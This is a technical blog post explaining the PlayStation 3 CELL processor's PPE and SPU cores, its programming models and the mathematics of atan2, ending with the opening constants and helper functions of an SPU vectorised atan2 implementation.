<h2 id="heading-powerpc-processing-unit-ppu"><strong>PowerPC Processing Unit (PPU)</strong></h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718424059218/b2f7780e-6ad6-436e-8722-a2c747102fbc.png" alt class="image--center mx-auto" /></p>
<p>The PPE, or Power Processing Element, is the general-purpose "leader" core of the CELL architecture. Unlike previous iterations where IBM adapted existing processors to meet new requirements, the PPE is a new CPU design specifically crafted for the CELL architecture. However, it is based on the PowerPC instruction set architecture (ISA) version 2.02, which was the last PowerPC specification before being rebranded as the Power ISA. The PPE shares a lineage with the PowerPC G5, as both are descendants of the POWER4 architecture, which was primarily used in workstations and supercomputers.</p>
<p>IBM's decision to leverage PowerPC technology for the PPE was driven by several factors. First, PowerPC was a mature platform with approximately 10 years of testing and refinement in the Macintosh user base, meeting Sony's requirements for the CELL architecture. Additionally, the PowerPC architecture could be adapted to different environments if needed. Crucially, the use of a well-known and established architecture provided compatibility with existing compilers and codebases, offering a significant advantage for a new console.</p>
<p>The PPE implements the PowerPC ISA version 2.02, including optional opcodes for floating-point square root operations. It has also been extended with a SIMD (Single Instruction, Multiple Data) instruction set called the <a target="_blank" href="https://arcb.csc.ncsu.edu/~mueller/cluster/ps3/SDK3.0/docs/accessibility/sdkpt/cbet_2vectsimd_ins.html">Vector/SIMD Multimedia Extension</a> (VMX). Notably, some elements from the original PowerPC specification are missing in the PPE, such as <a target="_blank" href="https://www.ibm.com/support/pages/just-faqs-about-little-endian">little-endian mode</a> (the CELL operates only in big-endian mode) and a handful of opcodes.</p>
<p>It's important to highlight that while the PPE leverages existing PowerPC technology, IBM constructed the PPE from the ground up, following the PowerPC 2.02 specification, rather than simply adapting an existing processor. This approach allowed IBM to optimize the PPE's design for the CELL's unique multi-core architecture and performance requirements, and also build interaction capabilities with the SPU.</p>
<h2 id="heading-synergistic-processing-unit-spu">Synergistic Processing Unit (SPU)</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718424118985/9e7a8ccc-f729-4217-af6e-e96f8c7f8efd.png" alt class="image--center mx-auto" /></p>
<p>The Synergistic Processor Unit (SPU) has its own instruction set architecture. While both the SPU and the PowerPC Processing Unit (PPU) follow Reduced Instruction Set Computer (RISC) principles, the SPU's ISA is proprietary and primarily composed of Single Instruction Multiple Data (SIMD) instructions. Consequently, the SPU features 128 128-bit general-purpose registers, which accommodate vectors comprising 32/16-bit fixed-point or floating-point values. At the same time, to conserve memory, SPU instructions are markedly compact, merely 32 bits in length. The initial segment contains the opcode, while the remaining portion can reference up to three operands to be computed in parallel.</p>
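<p>To make the register layout a bit more concrete, here is a minimal sketch in plain C of how one 128-bit register can be viewed as lanes of different widths. The <code>vec128</code> type and <code>vec128_add_f32</code> function are hypothetical names made up for this illustration, they are not part of the SPU toolchain, and the loop only imitates what a single SIMD instruction would do in hardware.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* Hypothetical model of one 128-bit register viewed as lanes.
   Plain C for illustration only, not the SPU intrinsics API. */
typedef union {
    float    f32[4];   /* four single-precision floats */
    uint32_t u32[4];   /* four 32-bit integers */
    uint16_t u16[8];   /* eight 16-bit integers */
    uint8_t  u8[16];   /* sixteen bytes */
} vec128;

/* Imitates one SIMD add: all four float lanes are summed "at once". */
vec128 vec128_add_f32(vec128 a, vec128 b)
{
    vec128 r;
    for (int i = 0; i &lt; 4; ++i)
        r.f32[i] = a.f32[i] + b.f32[i];
    return r;
}
</code></pre>
<p>The point of the union is only that the same 16 bytes can be read as 4, 8, or 16 lanes depending on the instruction that consumes them.</p>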
<p>This architecture bears resemblance to the preceding <a target="_blank" href="https://www.copetti.org/writings/consoles/playstation-2/#co-cpus">Vector Floating Point Unit</a> introduced in the PlayStation 2, albeit with substantial enhancements. For instance, developers are no longer required to learn a proprietary assembly language specific to the SPU, as IBM and Sony provided toolkits facilitating programming of the SPUs using C++, C, or assembly.</p>
<p>The SPEs are somewhat general-purpose coprocessors, not restricted to a single application, allowing them to assist the PPE in a wide range of tasks, provided that developers can program them properly. But the SPEs are more intended as the "assistant" cores of the CELL architecture, working in collaboration with the "leader" PPE to provide accelerated vector processing capabilities. By leveraging the SPEs' specialized design and local memory, the CELL architecture aims to offload computationally intensive tasks from the PPE, potentially achieving significant performance gains in applications that can take advantage of parallel processing and vector operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718425837553/9e18aaee-d7bd-4e61-b186-8faf2a2bd381.png" alt class="image--center mx-auto" /></p>
<p>The core of the SPE is the Synergistic Processor Unit (SPU), equivalent to the PPU in the PPE. But unlike the PPU, the SPU is isolated from the rest of the CELL architecture and does not have shared memory with the PPU or other SPUs. Instead, the SPU contains something called the Local Store (LS), used as a working space. The contents of this local memory can be moved back and forth using the Memory Flow Controller (MFC). In terms of functionality, the SPU is more limited compared to the PPU. It does not include memory management functions (address translation and memory protection) or advanced features like dynamic branch prediction. However, the SPU excels at vector processing operations. To program the SPU, developers use the PPU to invoke routines provided by the PlayStation 3's Operating System. These routines upload the executable specifically written for the SPU to the target SPU and signal it to start execution. After that, the PPU maintains a reference to the SPU's thread for synchronization purposes.</p>
<p>The Memory Flow Controller (MFC) is the component that interconnects the SPU with the rest of the CELL architecture, acting as an interface similar to the PowerPC Processor Storage Subsystem (PPSS) in the PPE. The primary function of the MFC is to move data between the SPU's local memory and the CELL's main memory, and to keep the SPU synchronized with its neighboring components. To perform its duties, the MFC embeds a Direct Memory Access (DMA) controller to handle communication between the Element Interconnect Bus (EIB) and the SPU's local memory. Additionally, the MFC houses another component called the Synergistic Bus Interface (SBI) that sits between the EIB and the DMA controller. The SBI is a complex piece of circuitry that interprets commands and data received from outside and signals the internal units of the SPE. As the front door to the CELL architecture, the SBI operates in two modes: bus master (where the SPE is adapted to request data from outside) or bus slave (where the SPE is set to receive orders from outside). It's worth noting that, considering the limit of EIB packets (up to 128 bits long), the MFC's DMA block can only move up to 16 KB of data per transfer. If a single transfer exceeds this limit, the EIB will throw a "Bus Error" exception during execution.</p>
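<p>In practice the 16 KB limit means larger buffers have to be moved in pieces. The following is a rough sketch of that chunking logic in portable C. The names <code>dma_transfer</code> and <code>dma_copy_chunked</code> are hypothetical, and <code>memcpy</code> is only a stand-in for the real MFC transfer, which is issued asynchronously on actual hardware.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;string.h&gt;

#define DMA_MAX_BYTES (16 * 1024)  /* the per-transfer limit described above */

/* Hypothetical stand-in for one DMA command. A real SPU program would
   issue an MFC transfer here instead of calling memcpy. */
void dma_transfer(void *dst, const void *src, size_t bytes)
{
    memcpy(dst, src, bytes);
}

/* Copy `total` bytes as a sequence of transfers of at most 16 KB each.
   Returns the number of transfers that were issued. */
size_t dma_copy_chunked(void *dst, const void *src, size_t total)
{
    unsigned char *d = dst;
    const unsigned char *s = src;
    size_t issued = 0;

    while (total &gt; 0) {
        size_t n = total &lt; DMA_MAX_BYTES ? total : DMA_MAX_BYTES;
        dma_transfer(d, s, n);
        d += n;
        s += n;
        total -= n;
        ++issued;
    }
    return issued;
}
</code></pre>
<p>For example, a 40 KB buffer would go out as two 16 KB transfers followed by one 8 KB transfer.</p>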
<h1 id="heading-programing-for-the-cell-architecture">Programming for the CELL Architecture</h1>
<p>As the CELL architecture is radically different from regular PC architectures, it is known to be very hard to program for (<a target="_blank" href="https://www.cnet.com/home/smart-home/sony-ps3-is-hard-to-develop-for-on-purpose/">by design</a>). Despite this, <a target="_blank" href="https://www.cresco.enea.it/LA1/cresco_sp14_ylichron/CBE-docs/CBE_Programming_Tutorial_v3.1.pdf">IBM proposed</a> some ideas on how programmers can build applications on the CELL architecture.</p>
<h2 id="heading-ppe-centric-approaches">PPE-centric Approaches</h2>
<p>These approaches place the primary computational responsibilities on the PPE, treating the SPEs as co-processors or accelerators to offload specific tasks or workloads. There are three main patterns within this category:</p>
<ol>
<li><p>Multistage Pipeline Model:</p>
<ul>
<li><p>The PPE acts as the driver, sending work to a single SPE.</p>
</li>
<li><p>Each SPE performs its assigned computations and passes the results to the next SPE in a pipeline fashion. The final SPE in the chain sends the processed data back to the PPE.</p>
</li>
<li><p>This model is not recommended for primary tasks due to the high inter-SPE communication overhead and complexity in managing the pipeline.</p>
</li>
</ul>
</li>
<li><p>Parallel Stages Model:</p>
<ul>
<li><p>The PPE decomposes the main task into independent sub-tasks.</p>
</li>
<li><p>Each sub-task is assigned to a different SPE for parallel execution. SPEs return their processed results to the PPE upon completion.</p>
</li>
<li><p>The PPE combines the results from all SPEs to produce the final output.</p>
</li>
<li><p>This approach can be effective for heavily parallelized workloads with minimal data dependencies.</p>
</li>
</ul>
</li>
<li><p>Services Model:</p>
<ul>
<li><p>Each SPE is assigned a specific service or job (e.g., audio decoding, video encoding, physics calculations). Service assignments to SPEs can be dynamically adjusted based on the program's changing requirements.</p>
</li>
<li><p>The PPE acts as a job dispatcher, sending input data to the appropriate SPE based on the required service. While awaiting results, the PPE can perform other tasks or manage system resources.</p>
</li>
<li><p>This model is suitable for applications with distinct, well-defined tasks that can be offloaded to dedicated SPEs.</p>
</li>
</ul>
</li>
</ol>
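<p>As a rough illustration of the Parallel Stages model, the sketch below splits a sum over an array into independent slices and combines the partial results. It is ordinary sequential C: <code>spe_sum_slice</code>, <code>ppe_parallel_sum</code>, and <code>NUM_SPES</code> are hypothetical names, the value 6 is an assumption, and on real hardware each slice would be handed to a separate SPE thread rather than called in a loop.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;

#define NUM_SPES 6  /* assumption: number of SPEs available to the program */

/* Work done by one "SPE": sum its own slice [begin, end). */
long spe_sum_slice(const int *data, size_t begin, size_t end)
{
    long acc = 0;
    for (size_t i = begin; i &lt; end; ++i)
        acc += data[i];
    return acc;
}

/* "PPE" side: decompose into independent slices, collect, combine. */
long ppe_parallel_sum(const int *data, size_t n)
{
    long partial[NUM_SPES];
    size_t chunk = (n + NUM_SPES - 1) / NUM_SPES;  /* ceiling division */

    for (int s = 0; s &lt; NUM_SPES; ++s) {
        size_t begin = (size_t)s * chunk;
        size_t end = begin + chunk;
        if (begin &gt; n) begin = n;
        if (end &gt; n) end = n;
        /* Runs sequentially here; each call has no dependency on the others. */
        partial[s] = spe_sum_slice(data, begin, end);
    }

    long total = 0;
    for (int s = 0; s &lt; NUM_SPES; ++s)
        total += partial[s];
    return total;
}
</code></pre>
<p>The structure to notice is that no slice reads another slice's result, which is what makes this pattern a good fit for workloads with minimal data dependencies.</p>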
<h2 id="heading-spe-centric-approaches">SPE-centric Approaches</h2>
<p>In contrast to the PPE-centric models, SPE-centric approaches place a greater emphasis on the SPEs as the primary computational engines, with the PPE playing a supporting role in resource management and coordination.</p>
<ul>
<li><p>Using their internal Direct Memory Access (DMA) units, SPEs directly fetch and execute tasks stored in main memory.</p>
</li>
<li><p>The PPE is responsible for initially setting up these tasks in memory and allocating them to the appropriate SPEs. Once the SPEs begin executing their assigned tasks, the PPE's involvement is minimized, allowing the SPEs to operate with a high degree of autonomy.</p>
</li>
<li><p>This approach can potentially unlock higher levels of parallelism and efficiency, as the SPEs are not constrained by frequent communication with the PPE.</p>
</li>
<li><p>However, it also introduces challenges in terms of data partitioning, synchronization, resource management, fault tolerance, and portability to other architectures.</p>
</li>
</ul>
<h2 id="heading-hybrid-approaches">Hybrid Approaches</h2>
<p>In practice, many applications may benefit from a hybrid approach that combines elements of both PPE-centric and SPE-centric models. For example:</p>
<ul>
<li><p>The PPE could handle high-level task management and coordinate the overall workflow, while computationally intensive or parallelizable workloads could be offloaded to the SPEs using an SPE-centric model.</p>
</li>
<li><p>The PPE could also perform pre-processing or post-processing tasks on the data before or after the SPE computations.</p>
</li>
<li><p>Communication and data transfer between the PPE and SPEs could be minimized by strategically partitioning the workload and leveraging DMA transfers.</p>
</li>
</ul>
<p>The choice of programming style depends on various factors, including the nature of the application, performance requirements, data dependencies, and the development team's familiarity with the Cell BE architecture and programming models.</p>
<p>While the heterogeneous multi-core architecture of the Cell BE offered significant computational power, programming it effectively presented several challenges that developers had to overcome:</p>
<ol>
<li><p>Code Partitioning and Load Balancing:</p>
<ul>
<li><p>Determining the optimal partitioning of code and data between the PPE and SPEs was crucial for maximizing performance.</p>
</li>
<li><p>Load balancing the workload across the SPEs to avoid bottlenecks and ensure efficient utilization of resources was a complex task.</p>
</li>
<li><p>Developers had to carefully analyze data dependencies, communication patterns, and computational requirements to make informed partitioning decisions.</p>
</li>
</ul>
</li>
<li><p>Memory Management and Data Transfers:</p>
<ul>
<li><p>Each SPE had a limited local store (256 KB) for instructions and data, necessitating careful memory management. Data transfers between main memory and SPE local stores had to be orchestrated efficiently using DMA transfers to minimize stalls and bottlenecks.</p>
</li>
<li><p>Techniques like double-buffering and software caching were often employed to overlap computation with data transfers.</p>
</li>
</ul>
</li>
<li><p>SIMD Vectorization:</p>
<ul>
<li><p>The SPEs featured a SIMD instruction set, enabling parallel operations on vectors of data. To fully leverage the SIMD capabilities, developers had to vectorize their code, which involved restructuring algorithms and data layouts to expose parallelism.</p>
</li>
<li><p>Compiler auto-vectorization support was limited, often requiring manual vectorization efforts by developers.</p>
</li>
</ul>
</li>
<li><p>Branch Prediction and Control Flow:</p>
<ul>
<li><p>The SPEs lacked dynamic branch prediction hardware, making control-intensive code with unpredictable branches less efficient.</p>
</li>
<li><p>Developers had to employ techniques like software pipelining, predication, and branch hint instructions to mitigate the impact of branch mispredictions.</p>
</li>
</ul>
</li>
<li><p>Synchronization and Communication:</p>
<ul>
<li><p>Coordinating the execution and communication between the PPE and multiple SPEs required careful synchronization mechanisms to avoid race conditions and ensure data coherency.</p>
</li>
<li><p>Efficient inter-core communication protocols and messaging schemes had to be implemented, often leveraging mailboxes, signal notifiers, and DMA transfers.</p>
</li>
</ul>
</li>
<li><p>Debugging and Profiling:</p>
<ul>
<li><p>Debugging and profiling parallel applications on the heterogeneous Cell BE architecture posed challenges due to the distributed nature of execution and limited visibility into the SPEs.</p>
</li>
<li><p>Specialized debugging and profiling tools were developed by IBM, Sony, and third-party vendors to aid developers in identifying performance bottlenecks and optimizing their applications.</p>
</li>
</ul>
</li>
</ol>
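<p>The branch-avoidance point is probably the least familiar one for x86 programmers, so here is a small sketch of the idea in portable C. Instead of an <code>if</code>, a comparison is turned into an all-zeros or all-ones mask and the result is picked with bitwise operations. The function names are hypothetical, and whether a given compiler really emits branch-free code for this is not guaranteed.</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;

/* Bitwise select: for each bit, take b where mask is 1, otherwise a. */
uint32_t select_bits(uint32_t a, uint32_t b, uint32_t mask)
{
    return (a &amp; ~mask) | (b &amp; mask);
}

/* Maximum of two unsigned values without an if statement. */
uint32_t max_u32_branchless(uint32_t a, uint32_t b)
{
    /* (b &gt; a) is 0 or 1; subtracting it from 0 gives 0x00000000 or 0xFFFFFFFF. */
    uint32_t mask = (uint32_t)0 - (uint32_t)(b &gt; a);
    return select_bits(a, b, mask);
}
</code></pre>
<p>The same compare-then-select shape applies lane by lane to vectors, which is why it shows up so often in SIMD code that would otherwise need data-dependent branches.</p>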
<p>This gives us a lot of challenges to work with, but also some very interesting opportunities to leverage coding styles and C trickery that many might be unfamiliar with when working with typical x86 binaries.</p>
<h1 id="heading-understanding-the-mathematics">Understanding the Mathematics</h1>
<p>The atan2 function, which computes the angle between the positive x-axis and a vector (x, y) in the Cartesian plane, is a fundamental operation in various scientific and engineering applications, such as computer graphics, robotics, and signal processing.</p>
<p>Mathematically, the arctangent function is expressed as:</p>
<p>$$\arctan(x) = \theta \iff \tan(\theta) = x, \quad \theta \in \left(-\tfrac{\pi}{2}, \tfrac{\pi}{2}\right)$$</p><p>The range of the arctangent function is therefore (-π/2, π/2) radians, or (-90°, 90°) degrees. However, in many applications, it is desirable to have the full range of (-π, π] radians, or (-180°, 180°] degrees. This is achieved by considering the signs of both the x and y inputs, leading to the atan2(y, x) function, which is a variation of the arctangent function.</p>
<p>The atan2(y, x) function computes the angle (in radians) between the positive x-axis and the vector (x, y) in the Cartesian plane. In the right half-plane it reduces to the ordinary arctangent:</p>
<p>$$\operatorname{atan2}(y, x) = \arctan\left(\frac{y}{x}\right) \quad \text{for } x &gt; 0$$</p><p>When x is negative the result is shifted by ±π according to the sign of y, and when x is zero the result is ±π/2. The first step in computing atan2 is to reduce the input arguments (x, y) to a specific range using well-known trigonometric identities. This process, known as argument reduction, simplifies the subsequent computation by limiting the input domain to a narrow interval. For atan2, the following identities are commonly used:</p>
<ul>
<li><p>atan2(-y, x) = -atan2(y, x)</p>
</li>
<li><p>atan2(y, -x) = π - atan2(y, x) for y ≥ 0</p>
</li>
<li><p>atan2(y, x) = π/2 - atan2(x, y) for |y| &gt; |x|</p>
</li>
</ul>
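<p>Put together, the identities above can be sketched as a scalar C routine. This is a simplified illustration, not the SPU implementation: <code>atan2_reduced</code> is a hypothetical name, the library <code>atanf</code> stands in for the polynomial that would normally be evaluated on the reduced range, and edge cases such as negative zero, infinities, and NaN are ignored.</p>
<pre><code class="lang-c">#include &lt;math.h&gt;

#define PI_F 3.14159265358979323846f

/* Reduce to a ratio z in [0, 1], evaluate atan there, then undo the
   reductions. atanf stands in for the polynomial approximation. */
float atan2_reduced(float y, float x)
{
    float ax = fabsf(x);
    float ay = fabsf(y);

    if (ax == 0.0f &amp;&amp; ay == 0.0f)
        return 0.0f;                     /* convention chosen for this sketch */

    int swap = ay &gt; ax;                  /* |y| &gt; |x| */
    float z = swap ? ax / ay : ay / ax;  /* z is now in [0, 1] */
    float r = atanf(z);                  /* core evaluation on the narrow range */

    if (swap)     r = PI_F / 2.0f - r;   /* atan2(y, x) = pi/2 - atan2(x, y) */
    if (x &lt; 0.0f) r = PI_F - r;          /* atan2(y, -x) = pi - atan2(y, x) */
    if (y &lt; 0.0f) r = -r;                /* atan2(-y, x) = -atan2(y, x) */
    return r;
}
</code></pre>
<p>Working on the absolute values first and restoring the signs last means the core evaluation only ever sees inputs between 0 and 1, which is what makes a low-degree polynomial viable there.</p>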
<p>Once the input arguments have been reduced, the core computation involves evaluating the atan(y/x) function on the reduced range. A common approach is to use a minimax polynomial approximation, which provides an accurate approximation of the function over a narrow interval.</p>
<p>Minimax polynomial approximation is a technique used in numerical analysis to find a polynomial <em>P</em>(<em>x</em>) of a given degree <em>n</em> that closely approximates a function <em>f</em>(<em>x</em>) over a specified interval [<em>a</em>, <em>b</em>]. The primary objective of this method is to minimize the maximum absolute deviation between the polynomial approximation and the function across the interval. This is quantified as:</p>
<p>$$\max_{x \in [a, b]} |f(x) - P(x)|$$</p><p>This expression is the peak absolute error. The polynomial <em>P</em>(<em>x</em>) is chosen to minimize this maximum error, hence the term "minimax". The polynomial approximation can be expressed as:</p>
<p>$$P(x) = c_0 + c_1 (x - x_0) + c_2 (x - x_0)^2 + \ldots + c_n (x - x_0)^n$$</p><p>Here, <em>x</em><sub>0</sub> typically represents a central point within the interval [<em>a</em>, <em>b</em>], often the midpoint, which can be strategically chosen to reduce computational complexity or improve the symmetry of the error distribution. The constants <em>c</em><sub>0</sub>, <em>c</em><sub>1</sub>, …, <em>c</em><sub><em>n</em></sub> are the coefficients of the polynomial, determined so as to achieve the minimax objective.</p>
<p>The Remez exchange algorithm is a popular method used to compute these coefficients. It iteratively adjusts the coefficients and the set of points at which the maximum error occurs, seeking to equalize the error at these points and minimize its peak value. This algorithm is particularly well-suited for finding minimax solutions due to its efficiency in handling the non-linear nature of the problem.</p>
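<p>The quantity being minimized can be estimated numerically by sampling. The sketch below does not implement Remez; it only measures the peak absolute error of a given polynomial against <code>atan</code> on an interval, which is the number a minimax fit tries to push down. The function name <code>peak_abs_error</code> and its parameters are hypothetical, and it assumes <code>samples</code> is at least 2.</p>
<pre><code class="lang-c">#include &lt;math.h&gt;
#include &lt;stddef.h&gt;

/* Peak absolute error of a degree-n polynomial (c[i] multiplies x^i)
   against atan on [a, b], sampled at `samples` evenly spaced points.
   Assumes samples &gt;= 2. */
double peak_abs_error(const double *c, size_t n, double a, double b, size_t samples)
{
    double worst = 0.0;
    for (size_t k = 0; k &lt; samples; ++k) {
        double x = a + (b - a) * (double)k / (double)(samples - 1);

        /* Evaluate the polynomial at x. */
        double p = c[n];
        for (size_t i = n; i-- &gt; 0; )
            p = p * x + c[i];

        double err = fabs(atan(x) - p);
        if (err &gt; worst)
            worst = err;
    }
    return worst;
}
</code></pre>
<p>As a sanity check, the crude approximation <em>P</em>(<em>x</em>) = <em>x</em> on [0, 1] is worst at <em>x</em> = 1, where the error is 1 - π/4, roughly 0.215. A sampled estimate like this can miss a peak that falls between sample points, so it is a lower bound on the true maximum.</p>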
<p>The evaluation of the minimax polynomial approximation is a critical component of the overall atan2 implementation. Two common techniques for efficient polynomial evaluation are Horner's scheme and Estrin's scheme.</p>
<p><a target="_blank" href="https://en.wikipedia.org/wiki/Horner%27s_method">Horner's scheme</a> is a numerically stable algorithm for polynomial evaluation that minimizes the number of multiplications. Given a polynomial of degree 𝑛:</p>
<p>$$P(x) = a_n x^n + a_{n-1} x^{n-1} + \ldots + a_1 x + a_0$$</p><p>Horner’s scheme reformulates this polynomial as:</p>
<p>$$P(x) = (((\ldots(a_n x + a_{n-1}) x + a_{n-2}) \ldots ) x + a_1) x + a_0$$</p><p>This nested multiplication approach reduces the computational complexity from O(n^2) operations (if computed naively) to O(n) multiplications and O(n) additions, thus enhancing efficiency, especially for large 𝑛. This scheme is particularly effective for sequential processing environments because it sequentially updates the result and requires maintaining only a single accumulator during computation.</p>
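<p>A minimal scalar sketch of Horner's scheme in C looks like this. The name <code>horner</code> and the coefficient ordering (lowest power first) are choices made for this example only.</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;

/* coeffs[i] multiplies x^i; n is the degree, so coeffs has n + 1 entries. */
double horner(const double *coeffs, size_t n, double x)
{
    double acc = coeffs[n];            /* start from the highest-order term */
    for (size_t i = n; i-- &gt; 0; )
        acc = acc * x + coeffs[i];     /* one multiply and one add per step */
    return acc;
}
</code></pre>
<p>Every iteration needs the previous value of <code>acc</code>, so the whole evaluation is one long dependency chain. That is cheap in operation count but leaves little for a pipelined processor to overlap.</p>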
<p><a target="_blank" href="https://en.wikipedia.org/wiki/Estrin%27s_scheme">Estrin's scheme</a>, on the other hand, regroups the polynomial into independent sub-expressions, each of which can be evaluated with fused multiply-add (FMA) instructions. While Estrin's scheme typically requires more instructions than Horner's scheme, its dependency chain is much shorter (roughly log₂ n levels instead of n), so it can exploit instruction-level parallelism more effectively, potentially improving performance on pipelined, dual-issue architectures like the CELL SPE. For the same polynomial P(x), Estrin's scheme pairs adjacent coefficients and then combines the pairs using successive squares of x:</p>
<p>$$P(x) = (a_0 + a_1 x) + (a_2 + a_3 x) x^2 + \big((a_4 + a_5 x) + (a_6 + a_7 x) x^2\big) x^4 + \ldots$$</p><p>This grouping is balanced when the number of coefficients is a power of two (that is, when the degree is 2^k - 1). Otherwise, dummy terms with coefficients of zero may be added to fit this scheme. Estrin’s method is particularly beneficial on architectures that support instruction-level parallelism and fused multiply-add (FMA) instructions, because the sub-expressions at each level are independent of each other and can be in flight simultaneously.</p>
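<p>To make the pairing concrete, here is a hedged scalar sketch of Estrin's scheme for a degree-7 polynomial (eight coefficients). The function name and coefficient layout are assumptions for illustration. Each <code>a * b + c</code> expression corresponds to one multiply-add, and the four expressions in the first level do not depend on each other:</p>
<pre><code class="lang-c">/* Evaluates c[0] + c[1] x + ... + c[7] x^7 with Estrin's scheme.
 * c[i] holds a_i (hypothetical layout). */
static float estrin_eval_deg7(const float c[8], float x)
{
    const float x2 = x * x;
    const float x4 = x2 * x2;

    /* Level 1: four independent pairs (a_i + a_(i+1) x) */
    const float p01 = c[1] * x + c[0];
    const float p23 = c[3] * x + c[2];
    const float p45 = c[5] * x + c[4];
    const float p67 = c[7] * x + c[6];

    /* Level 2: two independent combinations using x^2 */
    const float p0123 = p23 * x2 + p01;
    const float p4567 = p67 * x2 + p45;

    /* Level 3: final combination using x^4 */
    return p4567 * x4 + p0123;
}
</code></pre>
<p>The longest dependency chain here is three multiply-adds deep (plus the two squarings), compared with seven for Horner's scheme on the same polynomial. The price is the extra multiplications needed for x² and x⁴.</p>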
<h1 id="heading-design-considerations-of-the-code">Design Considerations of the Code</h1>
<p>By combining careful algorithm design with several optimization techniques, significant performance gains can be achieved for atan2 computation on the CELL SPE processor.</p>
<h2 id="heading-using-local-store-memory">Using Local Store Memory</h2>
<p>The CELL BE had a heterogeneous multi-core architecture consisting of one PowerPC-based Power Processing Element (PPE) and eight specialized co-processors called Synergistic Processing Elements (SPEs). Each SPE had its own Synergistic Processing Unit (SPU) and a small local memory (256 KB) referred to as the Local Store (LS).</p>
<p>The SPU's LS is a high-speed scratchpad memory, and it is designed to be the primary working memory for the SPU. Data had to be explicitly transferred between the main system memory and the LS using Direct Memory Access (DMA) operations, as the SPU could not directly access the main memory.</p>
<p>The LS in the Cell BE SPEs is fundamentally different from a normal hardware cache as it is a software-managed memory, meaning that the programmer has explicit control over data transfers between the LS and the main memory using DMA operations. In contrast, a hardware cache is transparent to the programmer: the processor's cache controller decides automatically which lines to fetch and which to evict.</p>
<p>The LS also doesn't sync with the main memory or other LS. Data consistency must be explicitly managed by the programmer through DMA transfers and synchronization primitives. On the other hand, hardware caches maintain coherency with the main memory and other caches in the system, transparently to the programmer.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Global Floating-point constants (32 bit)</span>

<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pio4 = { <span class="hljs-number">0x3f490fdb</span>, <span class="hljs-number">0x3f490fdb</span>, <span class="hljs-number">0x3f490fdb</span>, <span class="hljs-number">0x3f490fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_t3p8 = { <span class="hljs-number">0x3fe5ec5d</span>, <span class="hljs-number">0x3fe5ec5d</span>, <span class="hljs-number">0x3fe5ec5d</span>, <span class="hljs-number">0x3fe5ec5d</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_npio2 = { <span class="hljs-number">0xbfc90fdb</span>, <span class="hljs-number">0xbfc90fdb</span>, <span class="hljs-number">0xbfc90fdb</span>, <span class="hljs-number">0xbfc90fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pio2 = { <span class="hljs-number">0x3fc90fdb</span>, <span class="hljs-number">0x3fc90fdb</span>, <span class="hljs-number">0x3fc90fdb</span>, <span class="hljs-number">0x3fc90fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pt66 = { <span class="hljs-number">0x3f2aaaab</span>, <span class="hljs-number">0x3f2aaaab</span>, <span class="hljs-number">0x3f2aaaab</span>, <span class="hljs-number">0x3f2aaaab</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pi = { <span class="hljs-number">0x40490fdb</span>, <span class="hljs-number">0x40490fdb</span>, <span class="hljs-number">0x40490fdb</span>, <span class="hljs-number">0x40490fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_npi = { <span class="hljs-number">0xc0490fdb</span>, <span class="hljs-number">0xc0490fdb</span>, <span class="hljs-number">0xc0490fdb</span>, <span class="hljs-number">0xc0490fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_morebits = { <span class="hljs-number">0x38800000</span>, <span class="hljs-number">0x38800000</span>, <span class="hljs-number">0x38800000</span>, <span class="hljs-number">0x38800000</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_hmorebits = { <span class="hljs-number">0x34000000</span>, <span class="hljs-number">0x34000000</span>, <span class="hljs-number">0x34000000</span>, <span class="hljs-number">0x34000000</span> };

<span class="hljs-comment">// Helper functions to load constant values into quadwords</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpio4</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pio4); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flt3p8</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_t3p8); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flnpio2</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_npio2); }
